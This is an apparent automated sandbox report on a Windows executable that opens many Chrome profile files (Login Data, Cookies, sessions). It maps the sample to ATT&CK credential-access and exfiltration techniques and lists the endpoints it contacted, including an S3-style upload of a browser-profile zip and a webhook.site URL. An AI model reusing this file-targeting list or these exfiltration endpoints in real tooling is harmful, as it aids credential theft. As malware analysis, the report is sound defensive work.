Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation Database-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\000003.logJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session StorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Reporting and NEL-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsSiteDataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb\Docs.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Trust TokensJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network Action PredictorJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SharedStorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\jsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncmJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasmJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\TempJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\MANIFEST-000001Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Slides.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13340965317813669Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local StorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure PreferencesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Visited LinksJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Google Profile.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code CacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\NetworkDataMigratedJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000003.logJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsStateJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak\Google Drive.ico.md5Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Session_13340965342984957Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000003.logJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDBJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\extJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Shortcuts-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml\YouTube.ico.md5Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\CacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.logJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.ico.md5Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag\Slides.ico.md5Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Affiliation DatabaseJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibagJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldoomlJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferencesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\CURRENTJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf\Sheets.icoJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13340965343135326Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\trusted_vault.pbJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions\Tabs_13340965317929160Jump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\ShortcutsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest ResourcesJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db-journalJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store\LOGJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts\000003.logJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOCKJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials\LOG.oldJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PreferredAppsJump to behavior
Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000003.logJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Masquerading		1
OS Credential Dumping		21
Security Software Discovery		Remote Services1
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Modify Registry		LSASS Memory1
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Virtualization/Sandbox Evasion		Security Account Manager22
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Install Root Certificate		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Software Packing		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
file.exe5%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5;0%Avira URL Cloudsafe
https://docs.google.com/document/J0%Avira URL Cloudsafe
https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
https://www.ecosia.org/newtab/0%URL Reputationsafe
https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
https://drive.google.com/drive/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
https://docs.google.com/presentation/J0%Avira URL Cloudsafe
http://s3.amazonaws.com/doc/2006-03-01/0%Avira URL Cloudsafe
https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
https://www.youtube.com/:0%Avira URL Cloudsafe
https://mail.google.com/mail/?usp=installed_webapp0%Avira URL Cloudsafe
https://mail.google.com/mail/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
http://s3.amazonaws.com/doc/2006-03-01/The0%Avira URL Cloudsafe
https://mail.google.com/mail/:0%Avira URL Cloudsafe
https://docs.google.com/document/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
https://sandbox.google.com/payments/v4/js/integrator.js0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=en0%Avira URL Cloudsafe
https://docs.google.com/presentation/:0%Avira URL Cloudsafe
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de50%Avira URL Cloudsafe
https://docs.google.com/presentation/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
https://chrome.google.com/webstore?hl=enWeb0%Avira URL Cloudsafe
https://docs.google.com/spreadsheets/J0%Avira URL Cloudsafe
https://docs.google.com/document/:0%Avira URL Cloudsafe
https://www.google.com0%Avira URL Cloudsafe
https://docs.google.com/spreadsheets/?usp=installed_webapp0%Avira URL Cloudsafe
https://mail.google.com/mail/J0%Avira URL Cloudsafe
https://chrome.google.com0%Avira URL Cloudsafe
https://docs.google.com/spreadsheets/:0%Avira URL Cloudsafe
https://drive.google.com/?lfhs=20%Avira URL Cloudsafe
https://www.youtube.com/s/notifications/manifest/cr_install.html0%Avira URL Cloudsafe
https://www.youtube.com/?feature=ytca0%Avira URL Cloudsafe
https://www.youtube.com/J0%Avira URL Cloudsafe
https://drive.google.com/:0%Avira URL Cloudsafe
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240820122501-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?uploadId=bt24kn_zTbcHV6WZ2wBelxuQuTB6bMyvqDG8ICCHDMuT8Ws51JiOVQZ1BkDAFBiKM2iS4oGmGpChjjt6JN_wIds5sVNMf_XCqt7VRODSc28icvta8mfCv1iVnXr_-TlR0%Avira URL Cloudsafe
https://chrome.google.com/webstore0%Avira URL Cloudsafe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
https://payments.google.com/payments/v4/js/integrator.js0%Avira URL Cloudsafe
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240820122501-19882742-CC56-1A59-9779-FB8C0%Avira URL Cloudsafe
https://chrome.google.com/0%Avira URL Cloudsafe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
https://drive.google.com/J0%Avira URL Cloudsafe
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240820122501-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?uploads=0%Avira URL Cloudsafe
https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
http://s3.amazonaws.com/doc/2006-03-01/https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240%Avira URL Cloudsafe
https://csp.withgoogle.com/csp/report-to/chromewebstore0%Avira URL Cloudsafe
https://s3.ap-southeast-1.wasabisys.com/browser-profiles/202408220240820122501-19882742-CC56-1A59-970%Avira URL Cloudsafe
https://docs.google.com/presentation/?usp=installed_webapp0%Avira URL Cloudsafe
https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5https://webhook.site/efe6628a-60cc-4d7a-bd00%Avira URL Cloudsafe
https://docs.google.com/document/?usp=installed_webapp0%Avira URL Cloudsafe
https://clients2.googleusercontent.com0%Avira URL Cloudsafe
https://csp.withgoogle.com/csp/report-to/gws/none0%Avira URL Cloudsafe
https://www.google.com/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ap-southeast-1.wasabisys.com
154.18.200.103
truefalse
    		unknown
    webhook.site
    		178.63.67.106
    		truefalse
      		unknown
      s3.ap-southeast-1.wasabisys.com
      		unknown
      		unknownfalse
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://webhook.site/efe6628a-60cc-4d7a-bd08-479e31e08de5false
        • Avira URL Cloud: safe
        		unknown
        https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240820122501-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?uploadId=bt24kn_zTbcHV6WZ2wBelxuQuTB6bMyvqDG8ICCHDMuT8Ws51JiOVQZ1BkDAFBiKM2iS4oGmGpChjjt6JN_wIds5sVNMf_XCqt7VRODSc28icvta8mfCv1iVnXr_-TlRfalse
        • Avira URL Cloud: safe
        		unknown
        https://s3.ap-southeast-1.wasabisys.com/browser-profiles/20240820122501-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?uploads=false
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        https://duckduckgo.com/chrome_newtabfile.exe, 00000002.00000002.1496286874.000000C000185000.00000004.00001000.00020000.00000000.sdmp, Web Data.2.drfalse
        • Avira URL Cloud: safe
        		unknown
        https://mail.google.com/mail/?usp=installed_webappfile.exe, 00000002.00000002.1502481592.000000C00075F000.00000004.00001000.00020000.00000000.sdmp, 000003.log2.2.drfalse
        • Avira URL Cloud: safe
        		unknown
